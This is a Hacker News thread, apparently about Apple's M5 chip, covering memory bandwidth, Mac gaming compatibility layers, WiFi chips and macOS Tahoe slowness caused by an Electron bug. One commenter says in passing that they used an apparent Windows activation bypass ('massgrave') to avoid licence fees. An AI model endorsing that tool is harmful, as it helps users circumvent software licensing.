But the key difference is the type of memory. While NVIDIA's datacenter GPUs have shipped with HBM for a while now, the DGX Spark and the M4 use LPDDR5X, which is the main source of their memory bottleneck. And while unified memory chips with HBM are definitely possible (GH200, GB200), they are just less power efficient at low/idle load.

NVIDIA Grace sidestep: They actually use both HBM3e (GPU) and LPDDR5X (CPU) for that reason (load characteristics).

The moat of the memory makers is just so underrated…

Havoc•5h ago
I was looking at that number and thinking the opposite -- that's oddly slow, at least in the context of a new Apple chip.

Guessing that's their base tier and it'll increase on the higher-spec/more-memory models.

Retr0id•5h ago
Perhaps they're worried that if they make the memory bandwidth too good, people will start buying consumer apple devices and shoving them into server racks at scale.
tiahura•6h ago
No 16”?
adamch•6h ago
They'll announce that along with M5 Pro and Max in March or so.
littlecranky67•6h ago
And here I am, selling my Macbook M4 Pro to buy a Macbook Air and a dedicated gaming machine. I've tried gaming on the Macbook with Heroic, GPTK, Whisky, the RPCS3 emulator, and some native titles. When a game runs, the performance is stunning for a laptop -- but there are always glitches, bugs, and annoyances that take the joy out of it. Needless to mention the lack of any sort of online multiplayer, due to the lack of anticheat support.

I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

SigmundA•6h ago
Yep, I use Moonlight / Sunshine / Apollo to stream from my gaming PC, so I still use my Mac setup but get nearly perfect Windows gaming with the PC elsewhere in the house.

This has been by far the best setup until Apple can take gaming seriously, which may never happen.

bamboozled•6h ago
Sometimes I just feel like buying the latest and greatest game -- I have an M4 too -- and the choices are usually quite abysmal. I agree.
qnpnp•3h ago
My solution is cloud gaming in that case, such as GeforceNow (for compatible games), or Shadow (for a whole PC to do as you please).
gjsman-1000•6h ago
Many people blame the lack of OpenGL/Vulkan... but I really don't buy it. It doesn't pass the sniff test as an objection. PlayStation doesn't support OpenGL/Vulkan (they have their own proprietary APIs, GNM, GNMX, PSSL). Nintendo supports Vulkan but performance is so bad, almost everyone uses the proprietary API (NVN / NVN2). Xbox obviously doesn't accept OpenGL/Vulkan either, requiring DirectX. Understanding of Metal is widespread in mobile gaming, so it's weird AAA couldn't pull from that industry if they wished.
coldpie•5h ago
The primary reason is Apple's environment is too unstable for gaming's most common business model. Most games are developed, released, and then sold for years and years with little or no maintenance. Additionally, gamers expect the games they purchased to continue to work indefinitely. Apple regularly breaks backwards compatibility in a wide variety of ways (code signing requirements; breaking OS API changes; hardware architecture changes). That means software run on Apple OSes must be constantly maintained or else it will eventually stop working. Most games aren't developed like that.

No one who was forced to write a statement like [this](https://help.steampowered.com/en/faqs/view/5E0D-522A-4E62-B6...) is going to be enthusiastic about continuing to work with Apple.

gjsman-1000•5h ago
I've heard this argument, but it also doesn't pass the sniff test in 2025.

1. When is the next transition on bits? Is Apple going to suddenly move to 128-bit? No.

2. When is the next transition on architecture? Is Apple going to suddenly move back to x86? No.

3. When is the next API transition? Is Apple suddenly going to add Vulkan or reinvigorate OpenGL? No. They've been clear it's Metal since 2014, 11 years ago. That's plenty of time for the industry to follow if they cared, and mobile gaming has adopted it without issue.

We might as well complain that the PlayStation 4 was completely incompatible with the PlayStation 3.

coldpie•5h ago
I mean, I worked in this space, and I'm telling you why many of the people I worked with weren't interested in supporting Apple. I'm happy to hear your theories if you don't like mine, though.
gjsman-1000•5h ago
I think the past bit people, but unlike the PS4 transition or gaming consoles in the past (which were rarely backwards compatible), there wasn't enough cultural momentum to plow through it... leaving "don't support Apple" as a bit of an institutional memory at this point, even though the odds of another transition seem almost nonexistent. What would it even be? 128-bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?
coldpie•5h ago
Yeah, I buy that, so I think we are actually agreeing with each other. The very rough backwards support story Apple has had for the past decade, which I mentioned, has made people uninterested in supporting the platform, even if they're better about it now, as you claim (though I'm unconvinced about that personally, having worked on macOS software for more than a decade).

> What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

Sure, I can think of lots of things. Every macOS update when I worked in this space broke something that we had to go fix. Code signature requirements change a bit in almost every release, not hard to imagine a 10-year-old game finally running afoul of some new requirement. I can easily see them removing old, unmaintained APIs. OpenGL is actively unmaintained and I would guess a massive attack vector, not hard to see that going away. Have you ever seen their controller force feedback APIs? Lol, they're so bad, it's a miracle they haven't removed those already.

bigyabai•3h ago
> even though the odds of another transition seem almost nonexistent.

You see, the existence of that "almost" already represents less confidence than developers have in every game console, as well as in Linux and Windows.

fruitworks•5h ago
What happens when Apple switches to RISC-V, or deprecates versions of Metal in a backwards-incompatible way, or mandates some new code-signing technique?

The attitude in the Apple developer ecosystem is that Apple tells you to jump, and you ask how high.

You could complain that PlayStation 4 software is incompatible with the PlayStation 3, but this is the PC gaming industry; there are higher standards for software compatibility that only a couple of companies can ignore.

gjsman-1000•5h ago
Apple will never transition to RISC-V, especially when they cofounded ARM. They have 35 years of institutional knowledge in ARM. Their cores and techniques are licensed and patented with mixtures of their own IP and ARM-compatible IP. That is decades away, if ever. Even the assumption that RISC-V will eventually achieve parity with ARM performance is untested, as ISAs sometimes do fail at scale (Itanium, anyone? And while that's unlikely to repeat, even a discovered 5% structural deficit would handicap adoption permanently).

"This is the PC gaming industry"

Who said Apple needed to present themselves as a PC gaming alternative over a console alternative?

fruitworks•5h ago
Consoles are dying and PCs are replacing them. Like the original commenter suggested, people want to run PC games. The market has decided that the benefits of compatibility outweigh the added complexity. On the PC you have access to a massive expanding back-catalog of old software, far more competition in the market, mods, and you're able to run whatever software you want alongside games (discord, teamspeak, game streaming, etc.).

Macs are personal computers, whether or not they come from some official IBM Personal Computer compatibility bloodline.

gjsman-1000•5h ago
Steam Deck - 6 million

Sega Saturn - 9 million

Wii U - 13 million

PlayStation 5 - 80 million

Nintendo Switch - 150 million

Nintendo Switch 2 opening weekend - 4 million in 3 days

Sure.

ascagnel_•4h ago
For comparison, the lifetime sales of the first Nintendo Switch would be considered a good year for iPhone sales -- six generations of phones sold >150MM units.

https://en.wikipedia.org/wiki/List_of_best-selling_mobile_ph...

Sohcahtoa82•3h ago
And in the last 48 hours, Steam peaked at 39.5M users online, providing a highly pessimistic lower-bound on how many PC gamers there are.

https://store.steampowered.com/stats/stats/

If you consider time zones (not every PC gamer is online at the same time), the fact that it's not the weekend, and other factors, I'd estimate the PC gaming audience is at least 100M.

Unfortunately, there's no possible way to get an exact number. There are multiple gaming PC manufacturers, not to mention all the gaming PCs built by hand. I'm part of a PC gaming community, and nearly 90% of us have a PC built by ourselves or by a friend or family member. https://pdxlan.net/lan-stats/

jolux•5h ago
> I've heard this argument, but it also doesn't pass the sniff test in 2025.

I mean, it's at least partially true. I used to play BioShock Infinite on my MacBook in high school; there was a full port. Unfortunately it's 32-bit and doesn't run anymore, and there hasn't been a remaster yet.

galad87•5h ago
Game developers make most of their money shortly after a game's release, so having a 15-year-old game no longer work shouldn't make much difference in terms of revenue.

Anyway, the whole situation was quite bad. Many games were still 32-bit, even though macOS itself had been mainly 64-bit for almost 10 years or more. And Valve didn't help either; the Steam store is full of 64-bit games mislabeled as 32-bit. They could have written a simple script to check whether a game is actually 64-bit or not; instead they decided to do nothing and keep their chaos.

The best solution would have been a lightweight VM to run old 32-bit games; computers nowadays are powerful enough to do so.

littlecranky67•5h ago
I don't buy it either, because Apple's GPTK works similarly to Proton -- they have a DX12-to-Metal layer that works quite well, when it works. And GPTK is based on Wine, just like Proton. It is more about other annoyances, like the lack of Steam support. There are patched versions of Steam circulating that run in GPTK (offline mode), but that is where everything gets finicky and brittle. It is mostly community effort, and I think gaming could be way better on Apple if they embraced the Proton approach that they started with GPTK.
ldoughty•5h ago
Apple collects no money from Steam sales, so they don't see a reason to support it.

You don't buy Apple to use your computer the way you want to use it. You buy it to use it the way they tell you to. E.g. the "you're holding it wrong" fiasco.

In some ways this is good for general consumers (and even developers; with limited configs comes less unpredictability). However, it is generally bad for power users or "niche" users like Mac gamers.

raw_anon_1111•4h ago
Apple collects no money from Photoshop, Microsoft, or anything else that runs on the Mac besides the tiny minority of apps sold on the Mac App Store.

Not to mention many subscription services on iOS that don’t allow you to subscribe through the App Store.

littlecranky67•4h ago
> Apple collects no money from Steam sales, so they don't see a reason to support it.

That is true, but now they are in a position where their hardware is actually more affordable and powerful than its Windows/x86 counterpart -- and Win 11 is a shitload of adware and an annoyance in itself, layered on top of an OS. They could massively expand their hardware sales into the gaming sector.

I'm eyeing a Framework Desktop with an AMD AI 395 APU for gaming (I am happy with just 1080p@60) and am looking at 2000€ to spend, because I want a small form factor. Don't quote me on the benchmarks, but a Mac Mini with an M4 Pro would probably be cheaper and more powerful for gaming -- IF it had proper software support.

kllrnohj•4h ago
PlayStation, Nintendo, and Xbox each have tens of millions of gamers. Meanwhile, macOS makes up ~2% of Steam users, which is probably a pretty good proxy for the number of macOS gamers.

Why would I do anything bespoke at all for such a tiny market? Much less an entirely unique GPU API?

Apple refusing to support OpenGL and Vulkan absolutely hurt their gaming market. It increased the porting costs for a market that was already tiny.

littlecranky67•2h ago
> Why would I do anything bespoke at all for such a tiny market?

Because there is a huge potential here to increase market share.

sapiogram•6h ago
> I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

Note that games with anticheat don't work on Linux with Proton either. Everything else does, though.

rpdillon•6h ago
Many of them do, but it's a game of cat and mouse, so it's more hit and miss than I would like.
dralley•5h ago
Several games with anticheat work. But it's up to the developers whether they check the box that allows it to work, which is why even though both Apex Legends and Squad use Easy Anticheat, Squad works and Apex does not.

Of course some anticheats aren't supported at all, like EA Javelin.

ascagnel_•4h ago
Apex Legends is an interesting case because EA/Respawn initially shipped with first-class support for the Steam Deck (going as far as to make changes to the game client so it would get a "Verified" badge from Valve) -- including "check[ing] the box that allows it to work". However, the observation was that the anti-cheat code on Linux wasn't as effective, so they eventually dropped support for it.

https://forums.ea.com/blog/apex-legends-game-info-hub-en/dev...

bob1029•6h ago
> lack of anticheat support.

I just redid my windows machine to get at TPM2.0 and secure boot for Battlefield 6. I did use massgrave this time because I've definitely paid enough Microsoft taxes over the last decade. I thought I would hate this new stuff but it runs much better than the old CSM bios mode.

Anything not protected by kernel level anti cheats I play on my steam deck now. Proton is incredible. I am shocked that games like Elden Ring run this well on a linux handheld.

gwbas1c•6h ago
Honestly, gaming consoles are so much cheaper and "no hassle." I never game on my Mac.
littlecranky67•3h ago
More expensive in the long run, as the games are more expensive and you need some kind of subscription to play online.
dlojudice•5h ago
Good point. Many people (including me) switched to Apple Silicon with the hope (or promise?) of having just one computer for work and leisure, given the potential of the new architecture. That didn't happen, or only partially, which amounts to the same thing.

In my case, for software development, I'd be happy with an entry-level MacBook Air (now with a minimum of 16GB) for $999.

ryao•5h ago
Off the top of my head, here is what that needs:

  1. Implementing PR_SET_SYSCALL_USER_DISPATCH
  2. Implementing ntsync
  3. Implementing OpenGL 4.6 support (currently only OpenGL 4.1 is supported)
  4. Implementing Vulkan 1.4 with various extensions used by DXVK and vkd3d-proton.
That said, there are alternatives to those things.

  1. Not implementing this would just break games like Jurassic World where DRM hard codes Windows syscalls. I do not believe that there are many of these, although I could be wrong.
  2. There is https://github.com/marzent/wine-msync, although implementing ntsync in the XNU kernel would be better.
  3. The latest OpenGL isn't that important these days now that Vulkan has been widely adopted, although having the latest version would be nice to have for parity. Not many things would suffer if it were omitted.
  4. They could add the things needed for MoltenVK to support Vulkan 1.4 with those extensions on top of Metal:
https://github.com/KhronosGroup/MoltenVK/issues/203

It is a shame that they do not work with Valve on these things. If they did, Proton likely would be supported for MacOS from within Steam and the GPTK would benefit.

hannesfur•5h ago
I agree -- the difference between the various compatibility layers and native games is very steep at times. Death Stranding on my M2 Pro looks so good it's hard to believe, but running GTA Online is so brittle and clunky... Even when games have native macOS builds, it's rare to find them with Apple Silicon support (and even rarer with Metal support). There is a notable exception, though: Arma 3 has experimental Apple Silicon support, albeit with significant limitations (multiplayer, flying & mods). Although I don't believe it's in Apple's interest, gaming on Linux might become an option in the future, even on the Mac, but the lack of ARM builds is an even bigger problem there...

Since I am playing mostly MSFS 2024 these days, I currently use GeForce Now, which is fine, but cloud gaming still isn't quite there yet...

kllrnohj•4h ago
> Death Stranding on my M2 Pro looks so good it’s hard to believe,

Death Stranding is a great-looking game, to be sure, but it's also kinda hard to get excited about a 5-year-old game achieving RTX 2060 performance on a $2000+ system. And that was apparently worthy of a keynote feature...

imcritic•5h ago
What about wine flavor from crossdressers?
ed_elliott_asc•5h ago
Pretty sure you don’t mean crossdressers!

Codeweavers?

coldpie•5h ago
Little of column A, little of column B ;) This was a fun day in the office: https://www.codeweavers.com/blog/jwhite/2011/1/18/all-dresse...
dimgl•5h ago
Yeah I agree. If it weren't for gaming I would have already uninstalled Windows permanently. It's really unfortunate because it sticks out as the one product in my house that I truly despise but I can't get rid of, due to gaming.

I've been trying to get Unreal Engine to work on my Macbook, but Unity is an order of magnitude easier to run. So I'm also stuck doing game development on my PC. The Metal APIs exist and apparently they're quite good... it's a shame that more engines don't support them.

unsupp0rted•5h ago
I can't sell my MacBook Pro because the speakers are so insanely good. Air can't compare. The speakers are worth the extra kilos.
HDThoreaun•3h ago
I have never once used my laptop speakers. Not saying you're wrong, but it's crazy how different priorities for products can be.
prewett•1h ago
I was shocked when I tried out the 2019 MBP speakers; they were almost as good as my (low-end) studio headphones. I was even more shocked by the M2 speakers, which are arguably better (although not as flat a frequency response, I think; there's definitely something a little artificial, but it sounds really good). I really could not imagine laptop speakers being even close to on par with decent headphones. Perhaps they aren't on par with $400 headphones; I've never had any of those. But now by preference I listen on the laptop speakers. It's not a priority--I'm totally happy to go back to the headphones--more like an unexpected perk.
adastra22•54m ago
But why would you ever use the speakers?
mrcwinn•5h ago
Going back to the Air's screen from your Pro will be a steep fall.
littlecranky67•3h ago
Not really, 95% of the time I use it in a dock with 2 external screens.
ge96•4h ago
I'm gonna be looking for a 4080 in an SFF form factor, since my current gaming rig can't be upgraded to Win 11. Also, I wouldn't mind a smaller desktop.

edit: for now I'll get that win 10 ESU

gbil•4h ago
On top of that, what is Apple's strategy on gaming? Advertise extra performance and features that you only get if you upgrade your whole device? That is non-sustainable, to put it mildly. There are eGPU enclosures with TB5; developing something like that for the Mac would make more sense if they really cared about gaming.
jasoneckert•6h ago
With the same number and types (P/E) of cores, the M5 seems more like a feature refinement over M4. I wonder if this is a CPU that Apple released primarily for AI marketing purposes and perception, rather than to push the envelope.
willahmad•6h ago
Are we going to see SOTA local coding models anytime soon with this hardware, or is it still a long way off?
Etheryte•6h ago
You can already do that, just how slow or fast you go depends on how much you're ready to pay for memory. It's a $1200 premium to go from 36GB to 128GB of unified memory, that cost is hard to justify unless you really need it, or if someone else is paying.
willahmad•5h ago
None is comparable to the GPT-5 or Sonnet 4.5 experience.
mertbio•4h ago
Yet.
elzbardico•55m ago
Frankly, right now I am way more satisfied with qwen-3-coder-420 using Cerebras inference than with those more powerful models.

Inference speed and fast feedback matter a lot more than perfect generation to me.

StopDisinfo910•6h ago
I appreciate Apple propping up the GPU performance of their SoC but it feels a bit pointless when all the libraries they provide are so insular and disconnected from the rest of the industry.

I personally wish they would learn from the failure of Metal.

Also unleashes? Really? The marketing madness has to stop at some point.

mcv•5h ago
Soon they'll be stomping all over your calculation problems, and then obliterating them!
dralley•4h ago
Not that I've actually used any of these APIs, but supposedly Metal is the best-designed graphics API by a decent margin; it's just handicapped severely by how insular Apple and their ecosystem are.
bigyabai•4m ago
Depends on what you're comparing it to. Many people will point to OpenGL and Vulkan as comparisons, which is fair. But those are just the open-source alternatives; Metal is a proprietary solution competing against other well-designed options like DirectX and NVN.

I think Metal's ergonomics advantage is a much slimmer lead when you consider the other high-level APIs it competes with.

thurn•6h ago
No "max" or "pro" equivalent? I wanted to get a new Macbook Pro, but there's no obvious successor to the M4 Max available, M5 looks like a step down in performance if anything.
infecto•6h ago
I assume that would come with the next release cycle of the MacBook? Isn’t that supposed to be early next year?
nocoiner•6h ago
Apparently not until early next year. I was surprised by this too, but I hadn’t really been following the rumors at all, so I didn’t really have any grounds for being surprised by this.
ytch•6h ago
They usually release the Pro and Max models later:

M4: May 2024

M4 pro/max: Oct 2024

https://www.apple.com/newsroom/2024/05/apple-introduces-m4-c...

https://www.apple.com/newsroom/2024/10/apple-introduces-m4-p...

nsteel•5h ago
M3: same time

https://www.apple.com/newsroom/2023/10/apple-unveils-m3-m3-p...

M2: June 2022

M2 pro/max: Jan 2023

https://www.apple.com/newsroom/2022/06/apple-unveils-m2-with...

https://www.apple.com/newsroom/2023/01/apple-unveils-m2-pro-...

jmull•5h ago
No doubt the "wider" versions of the M5 are coming.

My hope is that they are taking longer because of a memory system upgrade that will make running significantly more powerful LLMs locally more feasible.

benjaminclauss•6h ago
Despite the flak Apple gets, their M-series continues to impress me as I learn more about hardware.
vardump•6h ago
I guess I'm waiting for the M5 Max chip. Hopefully it's configurable with 256 GB RAM for LLMs and some VMs.
mumber_typhoon•6h ago
The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

All in all, Apple is doing some incredible things with hardware.

Software teams at Apple really need to get their act together. The M1 itself is so powerful that nobody really needs to upgrade it for most things most people do on their computers. Tahoe, however, makes my M1 Air feel sluggish doing the exact same tasks I've been doing for the last couple of years. I really hope this is not intentional on Apple's part to make me upgrade. That would be a big letdown.

pantalaimon•6h ago
Won't that make Linux support even harder :/
ksec•5h ago
The Broadcom WiFi chip supports 320MHz while the N1 is stuck at 160MHz. There were reports of the N1 not supporting 4096-QAM as well, but I didn't check.
HumblyTossed•5h ago
"stuck".

A vanishingly small percentage of people can take advantage of 320MHz. It's fine.

londons_explore•5h ago
Today. But in 3 years' time it'll be widespread, and your Mac will be the one with the sluggish WiFi connection that jams up the airwaves for all other devices too.
shwaj•2h ago
How does it "jam up the airwaves" if it's operating at a different frequency than the devices you say it will be jamming?
landl0rd•1h ago
It really won't, and there will be a ton of devices "jamming up" the airwaves. In most places the backhaul isn't fast enough for anyone to get any use out of 320MHz channels, beyond maybe very large LAN file transfers, which are for some reason happening over WiFi?
fragmede•15m ago
Thankfully, there has been nothing new to use computers for since 2022. Definitely no new technology that involves downloading different 10+ GiB files to test with, and users couldn't possibly conceive of a NAS, never mind owning one, because Netflix has never removed shows while people were watching them, breaking an assumed promise to users. ISP speeds are never ever going to improve either. Everyone knows that!
MrAlex94•5h ago
Does it? If it's the same WiFi chip used in other M4 Macs, then it's still limited to 160MHz:

https://support.apple.com/en-gb/guide/deployment/dep268652e6...
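
For checking what your own machine actually negotiated, the built-in profiler reports the current channel and width (output format varies by macOS version):

  # Shows the current Wi-Fi PHY mode and channel, e.g. "Channel: 44 (5GHz, 80MHz)"
  system_profiler SPAirPortDataType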

t-3•5h ago
I doubt the number of people in both the "has no neighbors" and "owns Apple hardware" camps is significant at all.
fragmede•15m ago
Poe's law?
MrBuddyCasino•4h ago
I don’t think 4096 QAM is realistic anyway, except if your router is 10 cm away from your laptop.
ExoticPearTree•4h ago
> The Broadcom WiFi chip supports 320MHz while the N1 is stuck at 160MHz.

I was at a Wi-Fi vendor presentation a while back, and they said that 160MHz is pretty improbable unless you live alone with no wireless networks around you. And 320MHz even less so.

In real life, the best you can probably get is 80MHz in a really good wireless environment.

amluto•4h ago
I would believe that MLO or similar features could make it a bit more likely that large amounts of bandwidth would be useful, as it allows using discontiguous frequencies.

WiFi doesn't currently get anywhere near the bandwidth that these huge channels advertise in realistic environments.

astrange•1h ago
OFDMA also makes it more useful, but I don't know if vendors actually use that in practice.
shadowpho•4h ago
For which band? I run 160/160 on 5/6GHz and it's nice; they are short-range enough to work. For 2.4GHz, yeah, 20MHz only.
greg5green•1h ago
For 5GHz, that's pretty unusual. You need to be somewhere where DFS isn't an issue to even get 160MHz.

For 6GHz? Yeah, not uncommon.

mrtesthah•2h ago
Indeed, in any relatively dense setting no one should even think about using channels that wide. Think about the original problem with 2.4GHz 802.11b/g: there were only three non-overlapping channels, so you had interference no matter where you went. Why would we want to return to that hell?
zdw•3h ago
From Apple's support docs:

https://support.apple.com/guide/deployment/wi-fi-ethernet-sp...

No devices support 320MHz channel widths, and 160MHz is only supported on the 6GHz band on MacBooks and iPads. Some iPhones support 160MHz on 5GHz as well.

Avamander•47m ago
Channel width is not the only thing that determines the usability or quality of a chipset though.

Reducing Broadcom's influence over the WiFi ecosystem alone would be a large benefit.

kokada•5h ago
> Tahoe, however, makes my M1 Air feel sluggish doing the exact same tasks I've been doing for the last couple of years.

I have a work-provided M2 Pro with 32GB of RAM. After the Tahoe upgrade it feels like one of the sluggish PCs at the house. It is the only machine where I sometimes see the mouse teleporting when I move it fast. This is after disabling transparency in the Accessibility settings, mind you; it was even worse before.

fersarr•4h ago
same here
ExoticPearTree•4h ago
26.0.1 fixed the sluggishness. 26.0 was pretty unstable - felt like a game dropping frames.
kokada•4h ago
26.0.1 is better, but I can still get sluggishness in a few specific cases.

I just saw one example while moving the mouse quickly across my dock (I still use the magnify animation), and I could clearly see it dropping a few frames. This never happened in macOS 15.

speedgoose•4h ago
Do you have a few Electron-powered apps that haven't been updated yet?

Electron used to override a private function, which makes macOS sluggish on Tahoe, and apparently no one at Apple uses Electron apps while testing.

kokada•4h ago
I keep my applications pretty much up to date, but I didn't check the release notes of every Electron application I have to make sure they're all updated. I still think this is a failure of macOS, since one misbehaving application shouldn't slow the whole environment to a crawl.

What I can say is that while the situation is much better than at Day 1, the whole Tahoe experience is not as fluid as Sequoia.

Also, it doesn't really matter to me whether this was a private function or not; if this were Windows or GNOME/KDE, people would blame the desktop's developers instead.

speedgoose•4h ago
Yes I think Apple is to blame there. Electron is so prominent that they should have detected the problem and found a solution well before the general release.
IMTDb•2h ago
So now you can disregard the notion of a "private function" if you pass 100k stars on GitHub?
ruined•1h ago
all APIs are public APIs
javawizard•1h ago
There's definitely a line of thinking that would say "yes": https://www.hyrumslaw.com/
0x457•34m ago
Sure, someone will depend on it; we've all ignored "private" vs "public" at least once. Okay to do? Sure. Okay to be mad when your thing breaks because you decided to depend on it? Nope.
dylan604•4h ago
It shouldn't be the user's responsibility to know what architecture their software uses and then go looking for upgrades. Upstream comments blame Apple for "not testing Electron apps internally", but I don't expect Apple to regression-test every single app ever released. Apple releases betas, and software devs are expected to test their apps against them. The problem comes from the app devs using a bit of private code, which you're advised not to do for this very reason. Even if Apple did test and find the issue, it would still be the app devs who'd need to fix it. Maybe the thought is that an email from Apple to the dev saying "fix your code" would be more compelling?
kokada•3h ago
> Upstream comments blame Apple for "not testing Electron apps internally", but I don't expect Apple to regression-test every single app ever released.

This happens in pretty much every Electron app as far as I know, and lots of Electron apps, like Spotify, VSCode, or Slack, are very likely to be in the Top 10, or at least Top 100, most-used apps. And yes, I would expect Apple to test at least the most popular apps before releasing a new version of their OS.

> Maybe the thought is that an email from Apple to the dev saying "fix your code" would be more compelling?

Of course not. Apple controls the SDK; they could work around this in many different ways. For example, instead of changing how this function was implemented, they could have introduced a new method (they're both private, so it doesn't matter) and effectively ignored the old one (maybe also adding a build-time message for developers that the method was removed). It would draw ugly borders in the affected apps, but at least it wouldn't cause this issue.

dylan604•3h ago
> (maybe also they could add a message for developers building their application that this method was removed)

Why do we think this would be a fix, when the devs clearly ignored the previous guidance about not using a private method?

kokada•3h ago
> Why do we think this would be a fix, when the devs clearly ignored the previous guidance about not using a private method?

If anything, the fact that devs can actually access private symbols is an issue with how Apple designed their APIs; they could make it so annoying to do that nobody would try (for example, by stripping symbols).

Also, the fact that devs need to access private symbols to do what they need to do also shows that the public API is lacking at least some features.

Another thing: if this only affected the app itself, that would be fine, but it slows the whole system to a crawl.

So while devs share some of the blame here (and I am not saying they don't), I still think this whole situation is mostly Apple's fault.

tedivm•2h ago
If you actually read the specific bug and the use of the private method, it really was a stupid decision by one developer a while ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

I think the failures here are that Apple should have tested this themselves and the Electron devs should have tested and resolved this during the beta period.

magicalist•19m ago
> If you actually read the specific bug and the use of the private method, it really was a stupid decision by one developer a while ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

I don't think it's that clear cut. It looks like it was a workaround for a MacOS rendering bug going back to at least 2017, landed in 2019 and had no apparent downsides for six years[1].

The PR removing the private API code also included someone verifying that Apple had fixed the original bug some time in the intervening years[2].

I probably wouldn't have taken this approach personally (at the very least file the original rendering issue with Apple and note it with the code, though everyone knows the likelihood of getting a even a response on an issue like that), but it wasn't some cargo culted fix.

[1] https://github.com/electron/electron/pull/20360

[2] https://github.com/electron/electron/pull/48376#issuecomment...

wvenable•1h ago
"When developing Windows 95, one manager bought every program available at a local software store..."

https://www.pcworld.com/article/2816273/how-microsofts-windo...

0x457•37m ago
Spotify doesn't use Electron, though. Also, I do not expect Apple to care about Electron, because delivering a shitty Electron experience only benefits their native apps.
placatedmayhem•4h ago
The check script I've been recommending is here:

https://github.com/tkafka/detect-electron-apps-on-mac

About half of the apps I use regularly have been fixed. Some might never be fixed, though...
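
If you just want a quick look without the linked script, a minimal sketch of the same idea is to test each app bundle for the bundled Electron framework (this only detects Electron apps; unlike the script above, it can't tell whether the bundled version is patched):

  # List app bundles that ship the Electron framework
  for app in /Applications/*.app; do
    if [ -d "$app/Contents/Frameworks/Electron Framework.framework" ]; then
      echo "Electron: $app"
    fi
  done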

EasyMark•4h ago
wasn't there a workaround for those apps that might not ever get updated? I thought I saw something on reddit. Some config change
joshstrange•3h ago
> Run launchctl setenv CHROME_HEADLESS 1 on every system start. The CHROME_HEADLESS flag has a side effect of disabling Electron app window shadows, which makes them ugly, but also stops triggering the issue.

From: https://www.reddit.com/r/MacOS/comments/1nvoirl/i_made_a_scr...
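
To run that at every login, one option is a per-user LaunchAgent -- a sketch, saved as (say) ~/Library/LaunchAgents/local.chrome-headless.plist; the label and file name here are made up:

  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  <plist version="1.0">
  <dict>
    <key>Label</key>
    <string>local.chrome-headless</string>
    <key>ProgramArguments</key>
    <array>
      <string>/bin/launchctl</string>
      <string>setenv</string>
      <string>CHROME_HEADLESS</string>
      <string>1</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
  </dict>
  </plist>

Load it once with launchctl load ~/Library/LaunchAgents/local.chrome-headless.plist (or just log out and back in), and launchd re-applies the variable at each login.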

EasyMark•4h ago
This is why I stay on the previous release until at least the .0.2 or .0.3 point release, to let them work out the bugs so I don't have to deal with them. There was nothing in 26 that felt pressing enough for me to update.
abustamam•2h ago
Tbh I'm purposely not updating because I'm not in love with the new ~Aero~ glass UI.
michelb•3h ago
Even the OS and stock apps are much slower in Tahoe, and the UI updates/interactions are slower too. I'm lucky I only upgraded my least-used machine, and that's a well-stocked M2.
astrange•1h ago
It should not be slower. File a report in Feedback Assistant.
nikanj•1h ago
Or more likely nobody gives a damn about performance while doing testing.
kobalsky•4h ago
My tinfoil-hat theory is that with each OS iteration Apple adds a new feature that leverages the latest chip's hardware-acceleration features, and for older chips they fall back to software-only implementations.

They ship-of-Theseus the crap out of their OS, but replace parts with ones that need these new hardware features and run slowly on older chips in their software-only form.

I got the first-generation iPad Pro, which is e-waste now, but I use it as a screen for my CCTV. It cannot even display the virtual keyboard without stuttering like crazy, it lags when switching apps, and there's a delay for everything. This thing was smooth as butter on release.

thewebguyd•4h ago
I have the 4th-gen (2020) iPad Pro with the A12Z Bionic, the same chip they put in the Apple Silicon transition dev kits. With iPadOS 26 it's become barely usable, despite being as performant as ever on iPadOS 18. I'm talking a huge drop in performance, with stutters and slowdowns everywhere.

I was considering just replacing the battery and keeping it for several more years, but now I feel forced to upgrade, which has me considering whether I still want/need an iPad, since I'd also have to buy a new Magic Keyboard (they redesigned it) and they bumped the price ($1299 now vs. $999 when I got the 4th gen), so I'd be looking at $1700. Trying to hold out for an iPad Air with ProMotion.

I may be in the minority here, but I think 5 years is too short of a lifespan for these devices at this point. Early days when things were advancing like crazy, sure. But now? I have 8-year-old computers that are still just fine, and with the M-series chips I'd expect at least 10 years of usable life at minimum (battery notwithstanding)

qingcharles•4h ago
That's weird. I have an 8th Gen iPad, the slowest device that can run iPadOS 26, and everything is fine on that old thing. (except the OS takes up the majority of the storage)
thewebguyd•3h ago
Interesting. Might try a factory reset then and see. There's noticeable lag for me; it's especially slow when switching apps or bringing up the keyboard, as well as on first unlock. Interacting within a single app is still fine; it's interacting with the OS that's really sluggish.
gosub100•2h ago
Total guess but is there a tiny fan inside that got filled with dust? Maybe it's thermal throttling.
sgerenser•44m ago
Apple has never made an iPad with a fan
dwood_dev•1h ago
The 8th Gen iPad is about the same on iPadOS 26 as on 18 for me, which is slow. The 32GB of storage really handicaps it; to even upgrade it, I have to factory reset it first. I'm replacing it with a Mini.

The iPad Air 13 with a M3 is a really nice experience. Very fast device.

trinix912•25m ago
Plus they don't let you downgrade to previous iOS versions on iPhones and iPads (unless you were smart enough to save SHSH blobs and all that), so the only option to revert to a smooth version now is a sketchy jailbreak.
tsunamifury•2h ago
Disabling transparency adds another draw layer that is opaque on top, making it even worse than when it's on
prettyblocks•2h ago
I'm on an M2 with 24GB ram and it feels like it flies as fast as ever.
runjake•1h ago
It's probably due to the Electron bug[1]. A lot of common apps haven't patched up yet.

I also have an M2 Pro with 32GB of memory. When I A/B test with Electron apps running vs without, the lag disappears when all the unpatched Electron apps are closed out.

1. https://avarayr.github.io/shamelectron/

Here's a script I got from somewhere that shows unpatched Electron apps on your system:

Edit: HN nerfed the script. Found a direct link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...
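
For the curious, the gist boils down to something like this (a rough sketch, not the original script; whether the framework's Info.plist version maps cleanly to the Electron version is an assumption):

    #!/bin/sh
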